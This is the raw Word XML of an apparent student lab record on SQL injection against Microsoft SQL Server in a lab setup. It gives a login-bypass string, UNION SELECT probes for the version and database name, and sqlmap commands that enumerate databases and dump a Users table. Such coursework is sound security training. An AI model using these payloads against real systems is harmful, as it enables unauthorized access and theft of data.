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VIJAY VARSITH I</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">ROLL:NO:241901125</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14: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PERFORM AN SQL INJECTION ATTACK AGAINST MSSQL TO EXTRACT DATABASES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AIM:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To perform a manual and tool-assisted SQL Injection attack against a Microsoft SQL Server (MSSQL) backend to extract database information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="1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3"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120" w:before="1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THOERY:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="1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 happens when user input is directly concatenated into a SQL query without proper validation or parameterization. An attacker can manipulate the query logic to bypass login screens, read data they shouldn't have access to, or enumerate the entire database structure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="1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MSSQL has some unique syntax compared to MySQL (e.g., -- for comments works the same, but functions like @@version, stacked queries with ;, and system tables like sys.databases are MSSQL-specific).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="1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keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120" w:before="1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LAB SETUP:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="709"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="709"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Windows Server VM with MSSQL Server (Express edition is fine) + a sample vulnerable web front-end (ASP.NET/PHP login page) connected to MSSQL, with a Users table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="709"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="709"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 Kali Linux</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REQUIRED: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Burp Suite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sqlmap</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="1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PROCEDURE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">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Manual login bypass (authentication bypass) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">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vulnerable login page, in the username field, try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1' --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">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any password. If the login form doesn't sanitize input, this makes the WHERE clause always true, logging you in as the first user in the table (often admin).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="1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Confirm injection point with error-based testing </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">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search or ID parameter, try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;target-ip&gt;/product.aspx?id=1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">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MSSQL error message appearing on the page (e.g., "Unclosed quotation mark") confirms the parameter is injectable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="1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 Identify column count (for UNION-based injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;target-ip&gt;/product.aspx?id=1 ORDER BY 5--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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number until the page throws an error — that tells you the number of columns in the query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="1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Extract MSSQL version and database name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;target-ip&gt;/product.aspx?id=1 UNION SELECT NULL,@@version,NULL,NULL,NULL--</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">http://&lt;target-ip&gt;/product.aspx?id=1 UNION SELECT NULL,DB_NAME(),NULL,NULL,NULL—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">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 Automate extraction using sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://&lt;target-ip&gt;/product.aspx?id=1" --dbms=mssql --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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tables in a specific database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://&lt;target-ip&gt;/product.aspx?id=1" -D &lt;database_name&gt; --tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">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Dump the Users table:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://&lt;target-ip&gt;/product.aspx?id=1" -D &lt;database_name&gt; -T Users --dump</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1.Manual login bypass</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36918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510" cy="236918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147367" cy="1698822"/>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47367" cy="169882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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify column count (for UNION-based injection)</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27798" cy="292619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27798" cy="292619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Confirm injection point with error-based testing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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="182499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1824990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Extract the MSSQL version and database name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149998" cy="2889721"/>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49998" cy="288972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64100" cy="261874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864100" cy="261874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Automate extraction using sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="140" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1998345"/>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510" cy="199834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drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="161734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510" cy="161734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drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1859915"/>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510" cy="185991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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SQL Injection vulnerability was successfully identified in the authorized MSSQL web application. Database and table information were enumerated, and the sample Users table data was extracted using manual testing and sqlmap.</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
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1418" w:hanging="282"/>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
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6381" w:hanging="282"/>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